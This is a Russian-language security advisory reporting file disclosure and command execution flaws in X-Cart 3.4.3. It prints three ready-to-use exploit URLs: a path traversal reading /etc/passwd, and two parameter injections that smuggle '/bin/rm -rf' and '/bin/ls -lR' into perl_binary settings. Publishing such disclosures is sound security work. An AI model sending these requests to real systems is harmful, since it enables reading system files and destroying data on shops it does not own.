Просмотр произвольных файлов в X-Cart shopping software

Дата публикации:
06.02.2004
Всего просмотров:
1303
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: X-Cart 3.4.3

Описание: Уязвимость обнаружена в X-Cart shopping software. Удаленный пользователь может просматривать файлы и выполнять произвольные команды на целевой системе.

1. http://[target]/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../et c/passwd

2. http://[target]/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_ file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

3. http://[target]/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR ||

URL производителя:http://www.x-cart.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: X-Cart vulnerability

или введите имя

CAPTCHA